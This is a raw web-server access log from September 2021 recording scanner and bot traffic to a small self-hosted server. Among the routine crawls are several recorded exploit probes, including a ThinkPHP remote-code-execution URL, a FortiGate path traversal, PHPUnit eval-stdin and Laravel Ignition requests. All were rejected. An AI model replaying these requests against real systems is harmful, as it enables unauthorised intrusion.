[Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:00:27:51 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:00:27:56 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [23/Sep/2021:00:27:56 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:00:28:00 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:01:27:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.114] [Length 0] [Gzip -] "-" "-" [23/Sep/2021:01:27:47 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "-" "-" [23/Sep/2021:01:27:47 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [23/Sep/2021:02:02:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.107.251] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [23/Sep/2021:02:36:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.182] [Length 0] [Gzip -] "-" "-" [23/Sep/2021:03:09:08 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.150] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [23/Sep/2021:03:09:13 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 205.185.117.149] [Length 0] [Gzip -] "-" "-" [23/Sep/2021:03:09:14 +0000] 444 - OPTIONS https localhost "/" [Client 45.153.160.132] [Length 0] [Gzip -] "-" "-" [23/Sep/2021:03:09:15 +0000] 400 - - https localhost "-" [Client 45.153.160.132] [Length 154] [Gzip -] "-" "-" [23/Sep/2021:03:09:20 +0000] 400 - - https localhost "-" [Client 45.153.160.132] [Length 154] [Gzip -] "-" "-" [23/Sep/2021:03:12:16 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Sep/2021:03:30:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Sep/2021:04:59:31 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.221.195] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Sep/2021:05:58:04 +0000] 400 - POST http 64.22.31.253 "/35116102" [Client 195.78.54.192] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "-" [23/Sep/2021:06:04:53 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:06:04:53 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:07:24:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [23/Sep/2021:07:33:07 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Sep/2021:08:03:56 +0000] 444 - GET https 64.22.31.253 "/solr/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Sep/2021:08:06:54 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.33] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64" "-" [23/Sep/2021:08:14:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.214.107] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Sep/2021:08:41:33 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [23/Sep/2021:10:06:35 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [23/Sep/2021:10:39:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Sep/2021:12:31:08 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.216.92] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Sep/2021:13:36:15 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:13:36:16 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:14:20:32 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.33] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64" "-" [23/Sep/2021:14:40:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Sep/2021:16:28:12 +0000] 444 - GET https agent.moralanimal.net "/analytics/jbips/" [Client 194.48.199.121] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" "-" [23/Sep/2021:16:40:29 +0000] 400 - - http localhost "-" [Client 185.156.72.27] [Length 154] [Gzip -] "-" "-" [23/Sep/2021:16:40:29 +0000] 400 - - http localhost "-" [Client 185.156.72.27] [Length 154] [Gzip -] "-" "-" [23/Sep/2021:17:02:20 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Sep/2021:17:02:20 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Sep/2021:17:02:20 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Sep/2021:17:02:20 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Sep/2021:17:02:20 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Sep/2021:17:02:20 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [23/Sep/2021:17:28:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 94.102.49.193] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [23/Sep/2021:17:28:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 94.102.49.193] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [23/Sep/2021:17:28:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 94.102.49.193] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [23/Sep/2021:17:28:05 +0000] 400 - - https localhost "-" [Client 94.102.49.193] [Length 0] [Gzip -] "-" "-" [23/Sep/2021:17:28:05 +0000] 400 - - https localhost "-" [Client 94.102.49.193] [Length 0] [Gzip -] "-" "-" [23/Sep/2021:17:28:06 +0000] 400 - - https localhost "-" [Client 94.102.49.193] [Length 0] [Gzip -] "-" "-" [23/Sep/2021:17:28:10 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 94.102.49.193] [Length 0] [Gzip -] "-" "-" [23/Sep/2021:17:28:10 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 94.102.49.193] [Length 0] [Gzip -] "-" "-" [23/Sep/2021:17:28:11 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 94.102.49.193] [Length 0] [Gzip -] "-" "-" [23/Sep/2021:17:28:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [23/Sep/2021:18:21:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.116] [Length 0] [Gzip -] "-" "-" [23/Sep/2021:18:21:08 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "-" "-" [23/Sep/2021:18:21:08 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [23/Sep/2021:20:49:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 109.74.192.37] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [23/Sep/2021:20:53:15 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:20:53:16 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:20:58:14 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:20:58:14 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:21:18:06 +0000] 400 - - http localhost "-" [Client 87.251.75.145] [Length 154] [Gzip -] "-" "-" [23/Sep/2021:21:27:49 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:21:27:50 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:22:32:52 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:22:32:52 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:22:32:54 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:22:32:56 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:22:32:58 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:22:32:59 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:22:33:00 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:22:33:01 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [23/Sep/2021:22:33:03 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:22:33:05 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:22:33:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Sep/2021:22:56:14 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:22:56:14 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Sep/2021:22:56:33 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [23/Sep/2021:22:58:10 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [23/Sep/2021:22:58:42 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [23/Sep/2021:23:20:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Sep/2021:23:46:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 31.44.185.115] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [23/Sep/2021:23:50:21 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.216.44] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Sep/2021:00:11:52 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.221.174] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Sep/2021:00:12:42 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.221.231] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Sep/2021:00:13:11 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.112.66] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Sep/2021:00:17:59 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:00:18:00 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:01:12:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.212] [Length 0] [Gzip -] "-" "-" [24/Sep/2021:01:21:51 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [24/Sep/2021:02:05:39 +0000] 400 - POST http 64.22.31.253 "/52932354" [Client 191.96.168.191] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15" "-" [24/Sep/2021:02:39:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Sep/2021:03:43:02 +0000] 400 - HEAD http localhost "/" [Client 68.183.198.148] [Length 0] [Gzip -] "-" "-" [24/Sep/2021:03:43:02 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 68.183.198.148] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [24/Sep/2021:03:43:02 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 68.183.198.148] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [24/Sep/2021:03:43:02 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 68.183.198.148] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [24/Sep/2021:03:43:02 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 68.183.198.148] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [24/Sep/2021:03:43:02 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 68.183.198.148] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [24/Sep/2021:03:43:02 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 68.183.198.148] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [24/Sep/2021:03:43:02 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 68.183.198.148] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [24/Sep/2021:03:43:02 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 68.183.198.148] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [24/Sep/2021:03:43:03 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 68.183.198.148] [Length 252] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [24/Sep/2021:03:43:03 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 68.183.198.148] [Length 0] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [24/Sep/2021:03:43:03 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 68.183.198.148] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [24/Sep/2021:03:43:03 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 68.183.198.148] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [24/Sep/2021:03:52:15 +0000] 400 - GET http 64.22.31.253 "/admin/config.php" [Client 77.247.108.81] [Length 252] [Gzip -] "python-requests/2.26.0" "-" [24/Sep/2021:03:56:08 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [24/Sep/2021:04:24:19 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:04:24:20 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:04:50:17 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [24/Sep/2021:04:50:17 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [24/Sep/2021:04:50:18 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [24/Sep/2021:05:03:01 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.221.216] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Sep/2021:05:37:26 +0000] 444 - GET https booksonic.moralanimal.net "/analytics/jbips/" [Client 194.48.199.121] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" "-" [24/Sep/2021:05:43:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [24/Sep/2021:06:05:50 +0000] 400 - - http localhost "-" [Client 179.60.150.97] [Length 154] [Gzip -] "-" "-" [24/Sep/2021:06:38:07 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:06:38:08 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:07:16:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.72] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Sep/2021:07:19:29 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:07:19:29 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Sep/2021:08:15:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.215.27] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Sep/2021:08:38:31 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [24/Sep/2021:08:38:32 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [24/Sep/2021:08:38:32 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [24/Sep/2021:08:40:07 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) 